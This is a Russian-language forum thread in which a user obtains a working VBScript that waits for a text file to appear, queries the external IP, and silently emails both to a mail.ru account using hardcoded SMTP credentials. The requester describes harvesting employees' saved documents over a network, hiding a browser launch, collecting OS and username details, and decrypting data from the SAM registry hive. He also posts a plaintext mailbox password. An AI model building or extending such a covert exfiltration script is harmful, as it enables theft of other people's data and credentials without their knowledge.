![]() |
[решено] НУЖЕН Скрипт на VBS ДЛЯ отправки документа на почту
Здравствуйте, уважаемые формумчане, и профессионалы высокого класса люди.
Помогите пожалуйста создать скрипт на vbs чтобы без сторонних утилит и программ отправлял на почту @mail.ru,bk.ru,list.ru и тд. текстовый (документ.txt.) перепробовал кучу вариантов ничего не работает!!! :( Я новичок в этом деле, нужен готовый рабочий скрипт чтобы я вставил туда свои данные и все!!! |
NEOINFORMATIONIS, на какой ОС будет работать скрипт?
|
windows 7
Скрипт будет работать на операционной системе windows |
Господа, очень прошу вас помочь мне с этим скриптом, нужен рабочий скрипт!!!
вот нашел такой скрипт: Но он не работает, кто-нибудь может помочь с настройкой данного скрипта или есть альтернативный вариант??! Set objMessage = CreateObject("CDO.Message") emailFrom = "test@mail.ru" objMessage.Subject = "Проверка" objMessage.From = emailFrom objMessage.To = "test@mail.ru" objMessage.TextBody = "Загаловок" objMessage.AddAttachment "Путь до файла" objMessage.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2 objMessage.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.mail.ru" objMessage.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 2525 objMessage.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1 objMessage.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/sendusername") = emailFrom objMessage.Configuration.Fields.Item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = "Пароль от почты" objMessage.Configuration.Fields.Update objMessage.Send |
Уважаемый Iska Iska , прошу вас если есть возможность помочь мне посоветуйте что нибудь ...
Не обязательно на VBS можно на любом другом языке главное чтобы работал и был прост! |
Пробуйте:
Скрытый текст
Код:
Option Explicit |
Сейчас попробую и отпишусь!!! :)
Не работает данный код выдает ошибку... Строка: 1 Символ : 1 Ошибка : несоответсвие типа: !pation" код: 800А00D вот почта с которой нужно отправить документ на почту: dostupmne@bk.ru пароль: 12345qwW почта получателя: dostupdai@bk.ru |
ISKA, помогите пожалуйста разобраться с этим скриптом, ввожу все данные как вы и указали но выдает ошибку. Я написал Вас адрес электронной почты с которой нужно отправить, чтобы вы сами лично убедились что не работает скрипт либо я что та не так вбил!!!жду помощи
|
Цитата:
|
Вложений: 2
Сейчас скину вам код со своими данными
Вот, пожалуйста, вот так я заполняю данные, и ничего не работает. Код:
Option Explicit Файл 159544 http://forum.oszone.net/attachment.p...1&d=1573984197 Я скинул скриншот ошибки, попробуйте с моими данными которые я вам скинул.... ничего не работает, может я что та не так делаю?? Я беру этот код, ввожу свои данные: почта отправителя, пароль отправителя, место положение документа который нужно отправить и почту получателя все!!! потом все это сохраняю с расширением vbs. и запускаю его и выдает эту ошибку!!! Если Вам не сложно, проверьте пожалуйста у себя этот код!!! Вот мои данные от почты: отправитель: логин: dostupmne@bk.ru пароль: 12345qwW получатель: dostupdai@bk.ru ISKA, надеюсь на Вас!!! |
NEOINFORMATIONIS, успешно отправил сообщение, воспользовавшись указанными Вами данными:
Скрытый текст
Код:
Option Explicit Проверяйте. |
сейчас проверю и отпишусь :)
УРАААААААА!))))))) ОГРМОНОЕ ВАМ СПАСИБО, ISKA!!! ВЫ ПРОФЕССИОНАЛ ВЫСШЕГО КЛАССА!! И ЧЕЛОВЕК ДАННЫЙ ОТ БОГА!!! НИЗКИЙ ВАМ ПОКЛОН! ВСЕ РАБОТАЕТ!!! ХОТЕЛ,спросить еще , со временем смс не уйдут в бан?? мне на работе нужно будет постоянно это отправлять... каждый день..... Возможно ли такое что mail.ru заблокирует такую отсылку со временем?! |
ISKA, еще раз выражаю вам благодарность за оказанную помощь!!!
Но есть еще просьба , дописать в коде чтобы он отправлял мой внешний ip адрес на ту же почту. Если Вас не затруднит , пожалуйста, помогите провернуть это. |
NEOINFORMATIONIS, тогда надо начать с определения подходящего сервера, который будет в состоянии определять Ваш внешний текущий ip-адрес.
Что Вам говорит, например, http://ifconfig.me/ip (конкретики не надо, достаточно указать, что приведённый им адрес соответствует действительности)? Цитата:
Цитата:
|
ISKA, я столкнулся с одной очень неприятной проблемой, и ломаю над этим голову.
Скрипт который вы мне сделали работает хорошо, НО, проблема заключается в том, что данный документ которую нужно будет отправить на почту через (vbs скрипт) появляется не сразу а через некоторое время, точно предугадать время появлении нет возможности. И по этому думаю как бы сделать так,чтобы этот скрипт (vbs.) который и должен отправить на почту появившийся документ, проверял на наличии этого самого документа и только потом его отправлял на почту?! ISKA, ВОЗМОЖНО ДОПИСАТЬ В ЭТОМ КОДЕ , ЧТОБЫ ПЕРЕД ОТПРАВКОЙ НА ПОЧТУ ОНА ПРОВЕРЯЛА ЭТОТ ДОКУМЕНТ В ЭТОЙ ЖЕ ПАПКЕ ... НА СУЩЕСТВОВАНИИ ДАННОГО ДОКУМЕНТА, КАК ТОЛЬКО ДОКУМЕНТ ПОЯВИТСЯ ОН СРАЗУ ЖЕ ОТПРАВИТ НА ПОЧТУ, А ДО ТЕХ ПОР БУДЕТ ЖДАТЬ ЕГО ПОЯВЛЕНИЯ! А вот и сам код: Option Explicit Const cdoSendUsingPort = 2 Const cdoBasic = 1 Const strConstPartOfSchema = "http://schemas.microsoft.com/cdo/configuration/" Dim strSourceFile strSourceFile = "C:\Users\Admin\Documents\honestech TVR\документ.txt" With WScript.CreateObject("Scripting.FileSystemObject") If .FileExists(strSourceFile) Then With WScript.CreateObject("CDO.Message") .From = "dostupmne@bk.ru" .To = "dostupdai@bk.ru" .Subject = "File [" & strSourceFile & "]" .TextBody = "Мама мыла раму" .TextBodyPart.Charset = "windows-1251" .AddAttachment strSourceFile With .Configuration.Fields .Item(strConstPartOfSchema & "smtpserver") = "smtp.mail.ru" .Item(strConstPartOfSchema & "sendusing") = cdoSendUsingPort .Item(strConstPartOfSchema & "smtpserverport") = 465 .Item(strConstPartOfSchema & "smtpauthenticate") = cdoBasic .Item(strConstPartOfSchema & "sendusername") = "dostupmne@bk.ru" .Item(strConstPartOfSchema & "sendpassword") = "***12345qwW***" .Item(strConstPartOfSchema & "smtpusessl") = True .Update End With .Send End With Else WScript.Echo "Source file [" & strSourceFile & "] not found." WScript.Quit 1 End If End With WScript.Quit 0 |
Ответьте на вопрос, заданный мною в предыдущем сообщении.
Цитата:
P.S. И научитесь уже пользоваться тэгами. А не Caps Lock'ом. |
Документ создается автоматически каждый раз когда его запускаю.... он создается то сразу то через некоторое время.... установить время нет возможности все по разному. может минут через 5 может минут через 1,5мин,2,5мин... Чтобы времени не терять желательно чтобы мониторил каждые 5 сек на наличии этого документа. Сам документ обычный текстовик .txt. Мне нужно,чтобы в выше указанном коде как только появляется докумен сразу же отправлялся на почту.
Вот такая вот задача. |
Цитата:
P.S. Повторяю ещё раз — ответьте на вопрос: Цитата:
|
Ок, дело вот в чем, я учусь на информацинной безопасности, (студент) Мне задали задачу создать скрипт который бы отсылал любой текстовый документ будь то из базы 1с, или word и тд.
на почту. Документ выгружается из 1С каждый раз при создания бекапа... но в моем случаи время может быть разной...т.к. на разных пк время по разному установлена. Проще говоря мой скрипт должен сразу отправлять сохраненные данные из локальной сети мне на почту. Ибо все сотрудники в разное время сохраняют материал, как только они сохранили информацию, документы должны сразу же отправляться из указанной директории мне на почту или на почту иного лица не суть. вот и нужно мониторить на наличии материала в папке + ко всему этому нужно (желательно) отправить и мой ip адрес на почту, чтобы удостоверить с какой машины был отправлен документ. Короче говоря, документ появляется каждые 2-3-4-5 минут в папке расположенный скажем по такому адресу: C:\Мои проекты\0135\txt. И как только появиться сразу же он должен отправиться на почту. Чтобы сэкономить время необходимо проверять на наличие этого текстового документа каждые скажем 5 сек, как только появиться этот документ он отправит на почту. Вот и вся задача. Парень который ведет у нас лабы аспирант, иногда такую дичь задает что так и хочется им сказать в лицо.... Но куда деваться, мне надо это только пережить. 19 числа этого месяца должен ему сдать работу. Сделаю пойду в гору, (зачет) а не сделаю пойду в жопу, вот такой вот условие мне он поставил. :( :( |
На счет скрипта с отправкой ip на почту я кое что написал.... но она работает не со всем так как нужно! Если он код сам увидит то спалюсь... и не посчитает работу. Сейчас выложу сам код.
А вот и сам скрипт : Const navOpenInBackgroundTab = &H1000 Set ie = CreateObject("InternetExplorer.Application") Links = Array("http://speed-tester.info/link2/405623/") ie.Visible = false '// поставьте false, чтобы не было видно браузера first = True For Each link In Links If first Then ie.Navigate2 link first = False Else ie.Navigate2 link, navOpenInBackgroundTab End If Next WScript.Sleep(60000) '// Задержка 60 сек. For Each Window In CreateObject("Shell.Application").Windows With Window If .Name = "Windows Internet Explorer" Then For Each link In Links If InStr(1, .LocationURL, Title, vbTextCompare) <> 0 Then .Quit Exit For End If Next End If End With Next иначе говоря она скрытно запускает браузер переходит по ссылке а та в свое время определяет ip адрес мой. все делает в тихом режиме. Но такая работа безнадобность!!! Нужен другой способ по правильному, чтобы отсылал ip на почту. Что скажете ISKA??! |
http://ifconfig.me/ip этот адрес указывает мой настоящий ip адрес!
ISKA?, этот адрес: http://ifconfig.me/ip указывает мой настоящий текущий ip. |
Цитата:
Цитата:
Цитата:
Цитата:
Далее, что с ним (документом) потом происходит? Он так и продолжает валяться в данной папке? Цитата:
Цитата:
Цитата:
|
Честно говоря мне и самому интересно заниматься нечто подобным...просто у него такой дотошный характер что все на свете забываешь )
(ISKA,Ну, это точно не backup 1С . ) ВЕРНО ЗАМЕЧЕНО ОДНАКО,СКАЖЕМ ТАК ХИТРОЖОПАЯ ЗАДАЧА)) :mail1: ISKA, на счет папки... да, так и есть, она будет валяться в той же папке пока его скрипт не заметит и не отправит на почту. В скрипте где отправляет на почту, просто нужно дописать функцию мониторинга, для обнаружения документа, скажем так: скрипт следит за документом с названием (dog.txt.) каждые 5 сек проверяет на наличии его присутствия, как только находит сразу же шлет на почту. ВОТ И ВСЕ!!! Конечно, нужно еще в этом же коде дописать чтобы она отправляла еще мой внешний ip адрес на почту. |
Конечно, нужно еще в этом же коде дописать чтобы она отправляла еще мой внешний ip адрес на почту.
|
Сколько времени формируется этот документ? По максимуму?
Цитата:
|
В общем, вот Вам одноразовая болванка:
Скрытый текст
Код:
Option Explicit |
Iska, нет, ограничиваемся именно одним документом.
Кстати, протестировал данный скрипт, ничего на почту не отсылает ни какого документа и ни какого ip адреса нету! :( Iska, нет, ограничиваемся именно одним документом. Кстати, протестировал данный скрипт, ничего на почту не отсылает ни какого документа и ни какого ip адреса нету! :( |
Час от часу не легче - здесь студент-безопасник, который не учится и хочет, чтобы за него всё сделали, в соседней ветке - чудо-программист БД.
NEOINFORMATIONIS, зачем вам такая "учёба"? |
DJ Mogarych, Спасибо за заботу, но в моем случаи это необходимо!!
Но Вам наверное не понять... DJ Mogarych, Спасибо за заботу, но в моем случаи это необходимо!! Но Вам наверное не понять... |
Конечно, не понять. Главное, чтобы вы понимали.
|
DJ Mogarych , долго будешь доставать??!
|
DJ Mogarych , долго будешь доставать??!
ISKA, код который вы мне скинули не работает, ошибку не выдает , но и ip не отправляет на почту. ISKA, код который вы мне скинули не работает, ошибку не выдает , но и ip не отправляет на почту. |
Цитата:
Цитата:
Скрытый текст
![]() на указанный адрес. Спрашивается — что Вы делаете не так?! |
Iska, вот сам код которую вы мне прислали, я ничего с ней не делаю, там и так стоят мои данные. единственное указываю сам путь .... откуда документ должен отправиться.
ничего не приходит на почту. Option Explicit Const cdoSendUsingPort = 2 Const cdoBasic = 1 Const strConstPartOfSchema = "http://schemas.microsoft.com/cdo/configuration/" Dim strSourceFile Dim strContent strSourceFile = "C:\Мои проекты\0284\Source\Sample.txt" With WScript.CreateObject("Scripting.FileSystemObject") Do WScript.Sleep 100 Loop Until .FileExists(strSourceFile) WScript.Sleep 5 * 1000 With WScript.CreateObject("Microsoft.XMLHTTP") .open "GET", "http://ifconfig.me/ip", False .send strContent = .responseText End With With WScript.CreateObject("CDO.Message") .From = "dostupmne@bk.ru" .To = "dostupdai@bk.ru" .Subject = "File [" & strSourceFile & "]" .TextBody = "External IP: " & strContent .TextBodyPart.Charset = "windows-1251" .AddAttachment strSourceFile With .Configuration.Fields .Item(strConstPartOfSchema & "smtpserver") = "smtp.mail.ru" .Item(strConstPartOfSchema & "sendusing") = cdoSendUsingPort .Item(strConstPartOfSchema & "smtpserverport") = 465 .Item(strConstPartOfSchema & "smtpauthenticate") = cdoBasic .Item(strConstPartOfSchema & "sendusername") = "dostupmne@bk.ru" .Item(strConstPartOfSchema & "sendpassword") = "12345qwW" .Item(strConstPartOfSchema & "smtpusessl") = True .Update End With .Send End With End With WScript.Quit 0 Iska, вот сам код которую вы мне прислали, я ничего с ней не делаю, там и так стоят мои данные. единственное указываю сам путь .... откуда документ должен отправиться. ничего не приходит на почту. Option Explicit Const cdoSendUsingPort = 2 Const cdoBasic = 1 Const strConstPartOfSchema = "http://schemas.microsoft.com/cdo/configuration/" Dim strSourceFile Dim strContent strSourceFile = "C:\Мои проекты\0284\Source\Sample.txt" With WScript.CreateObject("Scripting.FileSystemObject") Do WScript.Sleep 100 Loop Until .FileExists(strSourceFile) WScript.Sleep 5 * 1000 With WScript.CreateObject("Microsoft.XMLHTTP") .open "GET", "http://ifconfig.me/ip", False .send strContent = .responseText End With With WScript.CreateObject("CDO.Message") .From = "dostupmne@bk.ru" .To = "dostupdai@bk.ru" .Subject = "File [" & strSourceFile & "]" .TextBody = "External IP: " & strContent .TextBodyPart.Charset = "windows-1251" .AddAttachment strSourceFile With .Configuration.Fields .Item(strConstPartOfSchema & "smtpserver") = "smtp.mail.ru" .Item(strConstPartOfSchema & "sendusing") = cdoSendUsingPort .Item(strConstPartOfSchema & "smtpserverport") = 465 .Item(strConstPartOfSchema & "smtpauthenticate") = cdoBasic .Item(strConstPartOfSchema & "sendusername") = "dostupmne@bk.ru" .Item(strConstPartOfSchema & "sendpassword") = "12345qwW" .Item(strConstPartOfSchema & "smtpusessl") = True .Update End With .Send End With End With WScript.Quit 0 |
ISKA, я вам и без скриншота верю!!!
|
NEOINFORMATIONIS, запишите видео о том, что Вы делаете — от начала и до конца, начиная от копирования кода с форума, до создания файла в указанном каталоге.
|
Попробовал все работает, понятии не имею с чем мог быть связан данный глюк. Все вводил правильно, даже сейчас...
ISKA, а чтобы он определял саму операционную систему, название пользователя, операционную систему+разрядность. какой код мне вписать туда еще? |
У меня новая тема, хочу к вам обратиться последней просьбой, ISKA, нужно из реестра извлечь некий reg.документ.
Но данные внутри зашифрованы, я могу их онлайн расшифровать. Но необходимо все это автомотизировать чтобы не было нужды заходить на этот сайт. Что посоветуете? приведу пример: Вот сама ветка в реестре: [HKEY_LOCAL_MACHINE\SAM\reset. вот пример зашифрованного внутреннего кода: 1,7,8,5,0,22,20,\ Извлекать его я могу но вот расшифровать без помощи онлайн сервисов нет. |
NEOINFORMATIONIS, Каша из топора (сказка) — Википедия.
|
ISKA, Ясно,понятно.
Но в вашем рассуждении есть одна неточность... в этот список я не вхожу! :sorry: Если эта лаба меня не убъет то (DJ Mogarych) точно. Ну какое твое дело что я делаю и как я это делаю... Хочет поучить меня в чем смысл жизни:) Комментирует сидит... ISKA, ВЫ хороший специалист, настоящий специалист своего дело! С Вами приятно поговорить, и решать задачи любого рода. Но если мои вопросы Вас угнетают сильно, то я буду искать помощи на стороне. :( |
могу на джава сделать эту функцию вот код: var vers={
"5.0":2000, "5.1":"XP", "5.2":"Server 2003", "6.0":"Vista", "6.1":7, "6.2":8, "6.3":"8.1", "10.0":10 }; navigator.userAgent.replace(/windows nt (\d+\.\d+)/gi,function(str,ver){ document.body.innerHTML+="<center>OS: Windows "+vers[ver]+"</center>"; return str }) Но нет ему на vbs нужно показать. ISKA, что думаете по этому поводу?! |
Думаю, что Вы движетесь не в том направлении.
|
Это в каком смысле?
ISKA, я все понимаю, и прошу по меньше слов в эту сторону, мне нужна ваша помощь, просто дописать этот код и покончить с этим. нужно чтобы она определял операционную сисему скажем windows 7 64 bit и имя пользователя скажем ADMIN-ПК и на этом все закончено. |
ISKA, у меня вопрос на счет вашего переделанного кода.
Дело вот в чем, в разделе C:\set\.txt" через некоторое время появляетя документ txt. и через 15 секунд удаляется чтобы не захломлять место. В это время ваш код должен его сразу же обнаружить и отправлять на почту, но он не находит и не отправляет до того как она удалится. Почему? strSourceFile = "C:\set\id.txt" With WScript.CreateObject("Scripting.FileSystemObject") Do WScript.Sleep 100 Loop Until .FileExists(strSourceFile) WScript.Sleep 5 * 1000 |
Например, потому, что он удаляется не через пятнадцать секунд.
|
ISKA, вчера вечером сталкнулся с такой проблемой, msconfig (конфигурация системы) в раздел "СЛУЖБА" неактивная. как ее восстановить?
похоже вирус подцепил, просканировал всеми возможными антивирусниками ничего не помогло. Может вирус сбил в настройках реестра что та ??? Вопрос: Как сделать активным эту вкладу "СЛУЖБА"??? |
Цитата:
|
Время: 10:36. |
Время: 10:36.
© OSzone.net 2001-